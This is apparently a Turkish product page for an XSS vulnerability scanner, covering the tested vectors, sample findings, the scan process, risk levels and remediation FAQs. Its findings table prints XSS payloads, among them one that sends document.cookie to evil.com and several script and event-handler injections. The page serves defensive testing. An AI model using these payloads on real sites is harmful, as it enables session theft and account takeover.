SiteGüvenlik
XSS Güvenlik Testi

XSS Açığı Var mı?

Reflected, Stored ve DOM-Based XSS saldırılarına karşı tüm form alanlarınızı ve URL parametrelerinizi test edin.

%65
Web uygulamalarında XSS
#2
OWASP sıralama
300+
Test edilen XSS payload
3 tip
Saldırı vektörü

Ne Tarıyoruz?

XSS testinde kontrol edilen vektörler

Reflected XSS
URL parametrelerinde yansıtılan script payload tespiti.
Stored XSS
Veritabanına kaydedilen ve her kullanıcıya gösterilen kalıcı XSS.
DOM-Based XSS
JavaScript kaynak kodunda güvensiz DOM manipülasyonu.
Script Enjeksiyonu
<script>, onerror, onload gibi HTML event handler payload.
Cookie Hırsızlığı
document.cookie üzerinden oturum çalma senaryosu test.
BeEF & Hook Testi
Browser exploitation framework hook payload denemeleri.
CSP Bypass
Content Security Policy politikasının atlatılma riski analizi.
Blind XSS
Adminlerin göreceği alanlara gizli XSS payload gömme testi.

Örnek Bulgular

Gerçek tarama çıktısından örnekler

Risk
Parametre
Payload
Sonuç
CRITICAL
?q=test
<script>alert(document.cookie)</script>
Cookie değeri sayfaya yansıdı — oturum çalınabilir.
CRITICAL
POST /yorum
<img src=x onerror=fetch('https://evil.com/'+document.cookie)>
Stored XSS — tüm ziyaretçiler etkileniyor.
HIGH
?redirect=/
javascript:alert(1)
JavaScript protokolü filtrelenmedi — yönlendirme XSS'e açık.
HIGH
?name=test
<svg onload=alert(1)>
SVG event handler payload çalıştı.
Tam raporu gör
MEDIUM
?msg=hello
<b onmouseover=alert(1)>text</b>
Kısmi filtreleme var — bypass mümkün.
Tam raporu gör
PASS
?search=test
Tüm payloadlar
HTML encode uygulandı — açık tespit edilmedi.
Tam raporu gör

Nasıl Çalışır?

XSS tarama süreci

01
URL & Form Keşfi
Tüm URL parametreleri, form alanları ve AJAX endpoint'leri otomatik olarak haritalandırılır.
02
Payload Enjeksiyonu
300+ XSS payload her tespit edilen giriş noktasına Reflected, Stored ve DOM-Based kategorilerinde denenir.
03
Yanıt Analizi
Sunucu yanıtı ve DOM davranışı analiz edilerek payload'ın çalışıp çalışmadığı tespit edilir.

Risk Seviyeleri

Bulgular dört seviyede raporlanır

KRİTİK
Saldırgan oturumu çalabilir veya stored XSS ile tüm ziyaretçileri etkileyebilir. Acil kapatma gerektirir.
YÜKSEK
JavaScript protokolü veya SVG event handler gibi kısmi açıklar. 24 saat içinde müdahale önerilir.
ORTA
Kısmi filtreleme mevcut ancak bypass mümkün. Planlanmış bakımda kapatılmalıdır.
TEMİZ
HTML encode, CSP ve diğer kontroller doğru uygulanmış. XSS riski tespit edilmedi.

Sıkça Sorulan Sorular

XSS güvenlik testi hakkında merak edilenler.

Saldırgan kurbanın oturumunu çalabilir, sahte form gösterebilir, keylogger yerleştirebilir ve hatta tüm hesabı ele geçirebilir. Stored XSS durumunda sitenizi ziyaret eden her kullanıcı etkilenir.

Reflected XSS yalnızca kurbana özel hazırlanmış link paylaşılarak çalışır. Stored XSS ise veritabanına yazılır ve siteyi ziyaret eden herkesi otomatik etkiler — çok daha tehlikelidir.

Doğru yapılandırılmış bir CSP XSS riskini önemli ölçüde azaltır; ancak 'unsafe-inline' gibi gevşek politikalar korumayı devre dışı bırakır. Tarayıcımız CSP başlığınızı da analiz eder.

Profesyonel planda 300+ XSS payload (Reflected, Stored, DOM-Based, CSP Bypass, WAF Bypass) her form alanı ve URL parametresi için test edilir.

Tüm kullanıcı girdileri HTML encode edilmeli, innerHTML yerine textContent kullanılmalı ve güçlü bir CSP politikası uygulanmalıdır. Raporumuzda tam kapatma kılavuzu yer alır.

Sitenizde XSS Açığı Var mı?

URL'nizi girin, hemen öğrenin